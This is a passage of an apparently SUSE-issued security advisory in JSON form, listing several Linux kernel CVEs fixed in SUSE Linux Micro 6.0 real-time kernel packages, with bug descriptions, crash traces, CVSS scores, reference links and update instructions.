this_cpu_ptr(NULL) evidently returns a pointer to the\nfixed_percpu_data. That struct looks just enough like a newly\ninitialized percpu var to allow nfsd_reply_cache_stats_show to access\nit without Oopsing.\n\nMove the initialization of the per-net+per-cpu reply-cache counters\nback into nfsd_init_net, while leaving the rest of the reply cache\nallocations to be done at nfsd startup time.\n\nKudos to Eirik who did most of the legwork to track this down.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54276",
"url": "https://www.suse.com/security/cve/CVE-2023-54276"
},
{
"category": "external",
"summary": "SUSE Bug 1255907 for CVE-2023-54276",
"url": "https://bugzilla.suse.com/1255907"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54276"
},
{
"cve": "CVE-2023-54278",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54278"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/vmem: split pages when debug pagealloc is enabled\n\nSince commit bb1520d581a3 (\"s390/mm: start kernel with DAT enabled\")\nthe kernel crashes early during boot when debug pagealloc is enabled:\n\nmem auto-init: stack:off, heap alloc:off, heap free:off\naddressing exception: 0005 ilc:2 [#1] SMP DEBUG_PAGEALLOC\nModules linked in:\nCPU: 0 PID: 0 Comm: swapper Not tainted 6.5.0-rc3-09759-gc5666c912155 #630\n[..]\nKrnl Code: 00000000001325f6: ec5600248064 cgrj %r5,%r6,8,000000000013263e\n 00000000001325fc: eb880002000c srlg %r8,%r8,2\n #0000000000132602: b2210051 ipte %r5,%r1,%r0,0\n \u003e0000000000132606: b90400d1 lgr %r13,%r1\n 000000000013260a: 41605008 la %r6,8(%r5)\n 000000000013260e: a7db1000 aghi %r13,4096\n 0000000000132612: b221006d ipte %r6,%r13,%r0,0\n 0000000000132616: e3d0d0000171 lay %r13,4096(%r13)\n\nCall Trace:\n __kernel_map_pages+0x14e/0x320\n __free_pages_ok+0x23a/0x5a8)\n free_low_memory_core_early+0x214/0x2c8\n memblock_free_all+0x28/0x58\n mem_init+0xb6/0x228\n mm_core_init+0xb6/0x3b0\n start_kernel+0x1d2/0x5a8\n startup_continue+0x36/0x40\nKernel panic - not syncing: Fatal exception: panic_on_oops\n\nThis is caused by using large mappings on machines with EDAT1/EDAT2. Add\nthe code to split the mappings into 4k pages if debug pagealloc is enabled\nby CONFIG_DEBUG_PAGEALLOC_ENABLE_DEFAULT or the debug_pagealloc kernel\ncommand line option.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54278",
"url": "https://www.suse.com/security/cve/CVE-2023-54278"
},
{
"category": "external",
"summary": "SUSE Bug 1255911 for CVE-2023-54278",
"url": "https://bugzilla.suse.com/1255911"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54278"
},
{
"cve": "CVE-2023-54281",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54281"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: release path before inode lookup during the ino lookup ioctl\n\nDuring the ino lookup ioctl we can end up calling btrfs_iget() to get an\ninode reference while we are holding on a root\u0027s btree. If btrfs_iget()\nneeds to lookup the inode from the root\u0027s btree, because it\u0027s not\ncurrently loaded in memory, then it will need to lock another or the\nsame path in the same root btree. This may result in a deadlock and\ntrigger the following lockdep splat:\n\n WARNING: possible circular locking dependency detected\n 6.5.0-rc7-syzkaller-00004-gf7757129e3de #0 Not tainted\n ------------------------------------------------------\n syz-executor277/5012 is trying to acquire lock:\n ffff88802df41710 (btrfs-tree-01){++++}-{3:3}, at: __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n\n but task is already holding lock:\n ffff88802df418e8 (btrfs-tree-00){++++}-{3:3}, at: __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #1 (btrfs-tree-00){++++}-{3:3}:\n down_read_nested+0x49/0x2f0 kernel/locking/rwsem.c:1645\n __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n btrfs_search_slot+0x13a4/0x2f80 fs/btrfs/ctree.c:2302\n btrfs_init_root_free_objectid+0x148/0x320 fs/btrfs/disk-io.c:4955\n btrfs_init_fs_root fs/btrfs/disk-io.c:1128 [inline]\n btrfs_get_root_ref+0x5ae/0xae0 fs/btrfs/disk-io.c:1338\n btrfs_get_fs_root fs/btrfs/disk-io.c:1390 [inline]\n open_ctree+0x29c8/0x3030 fs/btrfs/disk-io.c:3494\n btrfs_fill_super+0x1c7/0x2f0 fs/btrfs/super.c:1154\n btrfs_mount_root+0x7e0/0x910 fs/btrfs/super.c:1519\n legacy_get_tree+0xef/0x190 fs/fs_context.c:611\n vfs_get_tree+0x8c/0x270 fs/super.c:1519\n fc_mount fs/namespace.c:1112 [inline]\n vfs_kern_mount+0xbc/0x150 fs/namespace.c:1142\n btrfs_mount+0x39f/0xb50 fs/btrfs/super.c:1579\n legacy_get_tree+0xef/0x190 fs/fs_context.c:611\n vfs_get_tree+0x8c/0x270 fs/super.c:1519\n do_new_mount+0x28f/0xae0 fs/namespace.c:3335\n do_mount fs/namespace.c:3675 [inline]\n __do_sys_mount fs/namespace.c:3884 [inline]\n __se_sys_mount+0x2d9/0x3c0 fs/namespace.c:3861\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n -\u003e #0 (btrfs-tree-01){++++}-{3:3}:\n check_prev_add kernel/locking/lockdep.c:3142 [inline]\n check_prevs_add kernel/locking/lockdep.c:3261 [inline]\n validate_chain kernel/locking/lockdep.c:3876 [inline]\n __lock_acquire+0x39ff/0x7f70 kernel/locking/lockdep.c:5144\n lock_acquire+0x1e3/0x520 kernel/locking/lockdep.c:5761\n down_read_nested+0x49/0x2f0 kernel/locking/rwsem.c:1645\n __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n btrfs_tree_read_lock fs/btrfs/locking.c:142 [inline]\n btrfs_read_lock_root_node+0x292/0x3c0 fs/btrfs/locking.c:281\n btrfs_search_slot_get_root fs/btrfs/ctree.c:1832 [inline]\n btrfs_search_slot+0x4ff/0x2f80 fs/btrfs/ctree.c:2154\n btrfs_lookup_inode+0xdc/0x480 fs/btrfs/inode-item.c:412\n btrfs_read_locked_inode fs/btrfs/inode.c:3892 [inline]\n btrfs_iget_path+0x2d9/0x1520 fs/btrfs/inode.c:5716\n btrfs_search_path_in_tree_user fs/btrfs/ioctl.c:1961 [inline]\n btrfs_ioctl_ino_lookup_user+0x77a/0xf50 fs/btrfs/ioctl.c:2105\n btrfs_ioctl+0xb0b/0xd40 fs/btrfs/ioctl.c:4683\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:870 [inline]\n __se_sys_ioctl+0xf8/0x170 fs/ioctl.c:856\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n other info \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54281",
"url": "https://www.suse.com/security/cve/CVE-2023-54281"
},
{
"category": "external",
"summary": "SUSE Bug 1255820 for CVE-2023-54281",
"url": "https://bugzilla.suse.com/1255820"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54281"
},
{
"cve": "CVE-2023-54282",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54282"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: tuners: qt1010: replace BUG_ON with a regular error\n\nBUG_ON is unnecessary here, and in addition it confuses smatch.\nReplacing this with an error return help resolve this smatch\nwarning:\n\ndrivers/media/tuners/qt1010.c:350 qt1010_init() error: buffer overflow \u0027i2c_data\u0027 34 \u003c= 34",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54282",
"url": "https://www.suse.com/security/cve/CVE-2023-54282"
},
{
"category": "external",
"summary": "SUSE Bug 1255810 for CVE-2023-54282",
"url": "https://bugzilla.suse.com/1255810"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2023-54282"
},
{
"cve": "CVE-2023-54283",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54283"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Address KCSAN report on bpf_lru_list\n\nKCSAN reported a data-race when accessing node-\u003eref.\nAlthough node-\u003eref does not have to be accurate,\ntake this chance to use a more common READ_ONCE() and WRITE_ONCE()\npattern instead of data_race().\n\nThere is an existing bpf_lru_node_is_ref() and bpf_lru_node_set_ref().\nThis patch also adds bpf_lru_node_clear_ref() to do the\nWRITE_ONCE(node-\u003eref, 0) also.\n\n==================================================================\nBUG: KCSAN: data-race in __bpf_lru_list_rotate / __htab_lru_percpu_map_update_elem\n\nwrite to 0xffff888137038deb of 1 bytes by task 11240 on cpu 1:\n__bpf_lru_node_move kernel/bpf/bpf_lru_list.c:113 [inline]\n__bpf_lru_list_rotate_active kernel/bpf/bpf_lru_list.c:149 [inline]\n__bpf_lru_list_rotate+0x1bf/0x750 kernel/bpf/bpf_lru_list.c:240\nbpf_lru_list_pop_free_to_local kernel/bpf/bpf_lru_list.c:329 [inline]\nbpf_common_lru_pop_free kernel/bpf/bpf_lru_list.c:447 [inline]\nbpf_lru_pop_free+0x638/0xe20 kernel/bpf/bpf_lru_list.c:499\nprealloc_lru_pop kernel/bpf/hashtab.c:290 [inline]\n__htab_lru_percpu_map_update_elem+0xe7/0x820 kernel/bpf/hashtab.c:1316\nbpf_percpu_hash_update+0x5e/0x90 kernel/bpf/hashtab.c:2313\nbpf_map_update_value+0x2a9/0x370 kernel/bpf/syscall.c:200\ngeneric_map_update_batch+0x3ae/0x4f0 kernel/bpf/syscall.c:1687\nbpf_map_do_batch+0x2d9/0x3d0 kernel/bpf/syscall.c:4534\n__sys_bpf+0x338/0x810\n__do_sys_bpf kernel/bpf/syscall.c:5096 [inline]\n__se_sys_bpf kernel/bpf/syscall.c:5094 [inline]\n__x64_sys_bpf+0x43/0x50 kernel/bpf/syscall.c:5094\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nread to 0xffff888137038deb of 1 bytes by task 11241 on cpu 0:\nbpf_lru_node_set_ref kernel/bpf/bpf_lru_list.h:70 [inline]\n__htab_lru_percpu_map_update_elem+0x2f1/0x820 kernel/bpf/hashtab.c:1332\nbpf_percpu_hash_update+0x5e/0x90 kernel/bpf/hashtab.c:2313\nbpf_map_update_value+0x2a9/0x370 kernel/bpf/syscall.c:200\ngeneric_map_update_batch+0x3ae/0x4f0 kernel/bpf/syscall.c:1687\nbpf_map_do_batch+0x2d9/0x3d0 kernel/bpf/syscall.c:4534\n__sys_bpf+0x338/0x810\n__do_sys_bpf kernel/bpf/syscall.c:5096 [inline]\n__se_sys_bpf kernel/bpf/syscall.c:5094 [inline]\n__x64_sys_bpf+0x43/0x50 kernel/bpf/syscall.c:5094\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nvalue changed: 0x01 -\u003e 0x00\n\nReported by Kernel Concurrency Sanitizer on:\nCPU: 0 PID: 11241 Comm: syz-executor.3 Not tainted 6.3.0-rc7-syzkaller-00136-g6a66fdd29ea1 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/30/2023\n==================================================================",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54283",
"url": "https://www.suse.com/security/cve/CVE-2023-54283"
},
{
"category": "external",
"summary": "SUSE Bug 1255809 for CVE-2023-54283",
"url": "https://bugzilla.suse.com/1255809"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54283"
},
{
"cve": "CVE-2023-54285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niomap: Fix possible overflow condition in iomap_write_delalloc_scan\n\nfolio_next_index() returns an unsigned long value which left shifted\nby PAGE_SHIFT could possibly cause an overflow on 32-bit system. Instead\nuse folio_pos(folio) + folio_size(folio), which does this correctly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54285",
"url": "https://www.suse.com/security/cve/CVE-2023-54285"
},
{
"category": "external",
"summary": "SUSE Bug 1255807 for CVE-2023-54285",
"url": "https://bugzilla.suse.com/1255807"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54285"
},
{
"cve": "CVE-2023-54289",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54289"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qedf: Fix NULL dereference in error handling\n\nSmatch reported:\n\ndrivers/scsi/qedf/qedf_main.c:3056 qedf_alloc_global_queues()\nwarn: missing unwind goto?\n\nAt this point in the function, nothing has been allocated so we can return\ndirectly. In particular the \"qedf-\u003eglobal_queues\" have not been allocated\nso calling qedf_free_global_queues() will lead to a NULL dereference when\nwe check if (!gl[i]) and \"gl\" is NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54289",
"url": "https://www.suse.com/security/cve/CVE-2023-54289"
},
{
"category": "external",
"summary": "SUSE Bug 1255806 for CVE-2023-54289",
"url": "https://bugzilla.suse.com/1255806"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54289"
},
{
"cve": "CVE-2023-54291",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54291"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvduse: fix NULL pointer dereference\n\nvduse_vdpa_set_vq_affinity callback can be called\nwith NULL value as cpu_mask when deleting the vduse\ndevice.\n\nThis patch resets virtqueue\u0027s IRQ affinity mask value\nto set all CPUs instead of dereferencing NULL cpu_mask.\n\n[ 4760.952149] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 4760.959110] #PF: supervisor read access in kernel mode\n[ 4760.964247] #PF: error_code(0x0000) - not-present page\n[ 4760.969385] PGD 0 P4D 0\n[ 4760.971927] Oops: 0000 [#1] PREEMPT SMP PTI\n[ 4760.976112] CPU: 13 PID: 2346 Comm: vdpa Not tainted 6.4.0-rc6+ #4\n[ 4760.982291] Hardware name: Dell Inc. PowerEdge R640/0W23H8, BIOS 2.8.1 06/26/2020\n[ 4760.989769] RIP: 0010:memcpy_orig+0xc5/0x130\n[ 4760.994049] Code: 16 f8 4c 89 07 4c 89 4f 08 4c 89 54 17 f0 4c 89 5c 17 f8 c3 cc cc cc cc 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 83 fa 08 72 1b \u003c4c\u003e 8b 06 4c 8b 4c 16 f8 4c 89 07 4c 89 4c 17 f8 c3 cc cc cc cc 66\n[ 4761.012793] RSP: 0018:ffffb1d565abb830 EFLAGS: 00010246\n[ 4761.018020] RAX: ffff9f4bf6b27898 RBX: ffff9f4be23969c0 RCX: ffff9f4bcadf6400\n[ 4761.025152] RDX: 0000000000000008 RSI: 0000000000000000 RDI: ffff9f4bf6b27898\n[ 4761.032286] RBP: 0000000000000000 R08: 0000000000000008 R09: 0000000000000000\n[ 4761.039416] R10: 0000000000000000 R11: 0000000000000600 R12: 0000000000000000\n[ 4761.046549] R13: 0000000000000000 R14: 0000000000000080 R15: ffffb1d565abbb10\n[ 4761.053680] FS: 00007f64c2ec2740(0000) GS:ffff9f635f980000(0000) knlGS:0000000000000000\n[ 4761.061765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 4761.067513] CR2: 0000000000000000 CR3: 0000001875270006 CR4: 00000000007706e0\n[ 4761.074645] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 4761.081775] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 4761.088909] PKRU: 55555554\n[ 4761.091620] Call Trace:\n[ 4761.094074] \u003cTASK\u003e\n[ 4761.096180] ? __die+0x1f/0x70\n[ 4761.099238] ? page_fault_oops+0x171/0x4f0\n[ 4761.103340] ? exc_page_fault+0x7b/0x180\n[ 4761.107265] ? asm_exc_page_fault+0x22/0x30\n[ 4761.111460] ? memcpy_orig+0xc5/0x130\n[ 4761.115126] vduse_vdpa_set_vq_affinity+0x3e/0x50 [vduse]\n[ 4761.120533] virtnet_clean_affinity.part.0+0x3d/0x90 [virtio_net]\n[ 4761.126635] remove_vq_common+0x1a4/0x250 [virtio_net]\n[ 4761.131781] virtnet_remove+0x5d/0x70 [virtio_net]\n[ 4761.136580] virtio_dev_remove+0x3a/0x90\n[ 4761.140509] device_release_driver_internal+0x19b/0x200\n[ 4761.145742] bus_remove_device+0xc2/0x130\n[ 4761.149755] device_del+0x158/0x3e0\n[ 4761.153245] ? kernfs_find_ns+0x35/0xc0\n[ 4761.157086] device_unregister+0x13/0x60\n[ 4761.161010] unregister_virtio_device+0x11/0x20\n[ 4761.165543] device_release_driver_internal+0x19b/0x200\n[ 4761.170770] bus_remove_device+0xc2/0x130\n[ 4761.174782] device_del+0x158/0x3e0\n[ 4761.178276] ? __pfx_vdpa_name_match+0x10/0x10 [vdpa]\n[ 4761.183336] device_unregister+0x13/0x60\n[ 4761.187260] vdpa_nl_cmd_dev_del_set_doit+0x63/0xe0 [vdpa]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54291",
"url": "https://www.suse.com/security/cve/CVE-2023-54291"
},
{
"category": "external",
"summary": "SUSE Bug 1255798 for CVE-2023-54291",
"url": "https://bugzilla.suse.com/1255798"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
